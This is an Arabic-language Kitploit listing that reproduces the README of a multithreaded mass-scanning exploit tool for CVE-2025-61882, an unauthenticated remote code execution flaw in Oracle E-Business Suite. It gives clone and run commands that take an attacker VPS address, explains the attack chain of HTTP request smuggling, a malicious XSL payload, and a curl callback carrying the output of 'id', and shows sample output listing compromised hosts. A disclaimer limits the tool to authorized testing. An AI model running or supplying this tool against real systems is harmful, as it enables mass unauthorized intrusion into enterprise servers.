Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-61882 — # ماسح متعدد الخيوط لثغرة CVE-2025-61882 في Oracle E-Business Suite، يستغل تهريب طلبات HTTP لتحقيق تنفيذ برمجيات عن بُعد دون مصادقة والتحقق عبر مخرجات الأوامر. | Kitploit
أدوات/GitHubGitHub/sachinart/cve-2025-61882
الاستطلاعماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubsachinart/cve-2025-61882

CVE-2025-61882

# ماسح متعدد الخيوط لثغرة CVE-2025-61882 في Oracle E-Business Suite، يستغل تهريب طلبات HTTP لتحقيق تنفيذ برمجيات عن بُعد دون مصادقة والتحقق عبر مخرجات الأوامر.

عرض المستودع
117منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ماسح RCE لنظام Oracle E-Business Suite (CVE-2025-61882)

أداة فحص جماعي سريعة ومتعددة الخيوط لاكتشاف CVE-2025-61882 في تثبيتات Oracle E-Business Suite. تسمح هذه الثغرة الحرجة بتنفيذ التعليمات البرمجية عن بُعد دون مصادقة.

Python Version License CVE

🎯 الميزات

  • فحص جماعي - معالجة مئات أو آلاف الأهداف من ملف
  • متعدد الخيوط - فحص متزامن قابل للتكوين (الافتراضي: 20 خيطًا)
  • اكتشاف تلقائي - التحقق من RCE عن طريق تنفيذ أمر id وتحليل المخرجات
  • نتائج فورية - كتابة الأهداف الضعيفة إلى vuln-output.txt فورًا
  • منافذ عشوائية - استخدام منافذ عشوائية (2000-9999) لكل هدف لتجنب التعارضات
  • مخرجات نظيفة - تتبع التقدم مع الحد الأدنى من الضوضاء

📋 المتطلبات

root@kitploit:~
pip install requests

هذا كل شيء. فقط Python 3.7+ ومكتبة requests.

🚀 التثبيت

root@kitploit:~
git clone https://github.com/Sachinart/CVE-2025-61882.git
cd CVE-2025-61882
pip install -r requirements.txt

💻 الاستخدام

الفحص الأساسي

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP

فحص سريع (50 خيطًا)

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 50

فحص متحفظ (10 خيوط)

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 10

📝 تنسيق ملف الأهداف

أنشئ ملف targets.txt مع عنوان URL واحد في كل سطر:

root@kitploit:~
http://oracle-ebs1.example.com:8000
https://oracle-ebs2.example.com:443
http://192.168.1.100:8001
https://apps.company.com

📊 مثال على المخرجات

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║   Oracle E-Business Suite RCE Scanner (CVE-2025-61882)       ║
╚═══════════════════════════════════════════════════════════════╝

[*] Loaded 1235 targets from file
[*] Running with 20 concurrent threads
[*] Vulnerable hosts will be saved to vuln-output.txt

[*] [1/1235] Checking https://target1.com:443 on port 7893
[*] [2/1235] Checking https://target2.com:443 on port 5882

[+] Got one! 129.146.56.43 is vulnerable
[+] Command output: uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)

=================================================================
[*] Scan finished in 245.67 seconds
[*] Found 3 vulnerable target(s)
[*] Check vuln-output.txt for full results
=================================================================

[+] Vulnerable targets found:

    129.146.56.43 → uid=54321(oracle) gid=54321(oinstall)
    192.168.1.50 → uid=1000(applmgr) gid=1000(dba)
    10.0.0.100 → uid=500(oracle) gid=500(oinstall)

📄 ملف المخرجات

يتم حفظ النتائج في vuln-output.txt:

root@kitploit:~
# Oracle EBS CVE-2025-61882 - Scan Results
# Started: Tue Oct 07 15:30:45 2025
# Total targets: 1235
# Scanner by: Chirag Artani

129.146.56.43 | uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
192.168.1.50 | uid=1000(applmgr) gid=1000(dba) groups=1000(dba)
10.0.0.100 | uid=500(oracle) gid=500(oinstall) groups=500(oinstall)

🔍 كيف يعمل

  1. استرجاع رمز CSRF - جلب رمز CSRF صالح من الهدف
  2. تهريب طلبات HTTP - استغلال ثغرة التهريب لحقن حمولة ضارة
  3. تسليم حمولة XSL - تقديم ورقة أنماط XSL ضارة تنفذ الأوامر
  4. التحقق من الاستدعاء - ينفذ الهدف أمر id ويرسل المخرجات مرة أخرى عبر curl
  5. مطابقة التعبيرات النمطية - التحقق من نجاح RCE عن طريق فحص نمط uid=...gid=...

⚙️ الإعدادات

🔒 الإفصاح المسؤول

هذه الأداة مخصصة لاختبارات الأمان المصرح بها فقط. دائمًا:

  • ✅ احصل على إذن كتابي قبل الاختبار
  • ✅ افحص فقط الأنظمة التي تملكها أو لديك تفويض صريح لاختبارها
  • ✅ أبلغ عن النتائج بمسؤولية للمنظمات المتأثرة
  • ✅ اتبع ممارسات الإفصاح المنسق عن الثغرات
  • ❌ لا تستخدم هذا أبدًا على أنظمة غير مصرح بها

الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.

🐛 المشكلات المعروفة

  • قد تنتهي مهلة بعض الأهداف بسبب حظر جدار الحماية/IDS
  • يتطلب اكتشاف الاستدعاء وصول الهدف إلى VPS الخاص بك على منافذ عشوائية
  • يتم تجاهل تحذيرات شهادة SSL (متوقع لاختبار الاختراق)

🤝 المساهمة

وجدت خطأ؟ لديك طلب ميزة؟

  1. انسخ المستودع (Fork)
  2. أنشئ فرع الميزة الخاص بك (git checkout -b feature/amazing-feature)
  3. قم بتسجيل تغييراتك (git commit -m 'Add some feature')
  4. ادفع إلى الفرع (git push origin feature/amazing-feature)
  5. افتح طلب سحب (Pull Request)

📜 الترخيص

هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.

⚠️ إخلاء المسؤولية

هذه الأداة مقدمة لأغراض تعليمية واختبارات الأمان المصرح بها فقط. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة. استخدمها على مسؤوليتك الخاصة.

📚 المراجع

  • تفاصيل CVE-2025-61882
  • تحديث التصحيح الحرج من Oracle

👨‍💻 تم التطوير بواسطة Chirag Artani

الموقع الإلكتروني • تويتر • لينكد إن

صُنع بـ ❤️ لمجتمع أمن المعلومات

تنزيل الأداة
الوسيطمطلوبالافتراضيالوصف
--targetsنعم-مسار الملف الذي يحتوي على عناوين URL للأهداف
--lhostنعم-عنوان IP الخاص بـ VPS/المهاجم
--threadsلا20عدد الخيوط المتزامنة